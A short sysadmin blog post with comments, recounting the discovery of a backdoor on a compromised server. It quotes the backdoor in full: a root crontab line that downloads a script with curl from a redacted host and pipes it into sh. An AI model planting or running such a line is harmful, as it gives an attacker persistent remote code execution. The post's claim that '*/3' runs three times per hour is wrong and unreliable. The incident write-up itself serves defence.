Recently, I found that one of my servers was infected with a malicious Apache module. This is not something I am too proud of, but it happens. The original infection happened either through Plesk or through a pre-existing user. That is why I am stopping using Plesk control panels on the VPSes and DEs I own and manage. The upgrade process between major versions is painful, and one can’t expect to keep such servers secure for longer periods of time.
However, what is more interesting about this story is the backdoor, which was very simple and sat in plain sight. This line was in root’s crontab, and each admin thought it was something another admin used for monitoring or something else:
*/3 * * * * /usr/bin/curl --connect-timeout 5 --max-time 10 -s http://xxx.xxx.xxx.xxx/cache/svn.php?host=xxx.xxx.xxx | sh >> /dev/null
This cron job launches 3 times per hour and downloads and executes a single command. It is very simple, but it lets whoever controls that URL download and execute any command on one’s server at any time, and with nothing in place while it is idle. I am still blaming myself for not noticing it earlier.
SuNcO · December 16, 2013 at 11:16 am
Hi, I found this on my server. Did you find the downloaded files and see what they really do? I mean, I want to find the malicious code on my server.
Giedrius Majauskas · December 16, 2013 at 4:37 pm
It’s a backdoor (that is, one might run ANYTHING when it is in crontab). However, at that point there were no active commands for my server, so I just killed it.
SuNcO · December 19, 2013 at 12:55 pm
Uhm… my server still wants to connect to different SSH servers on random days/hours. I just blocked them with an iptables rule.
There is something corrupt on my server, but I still can’t find what it is.
Giedrius Majauskas · December 19, 2013 at 2:47 pm
Look for an Apache module out of place, as an example. There might be something that has modules and runs all the time.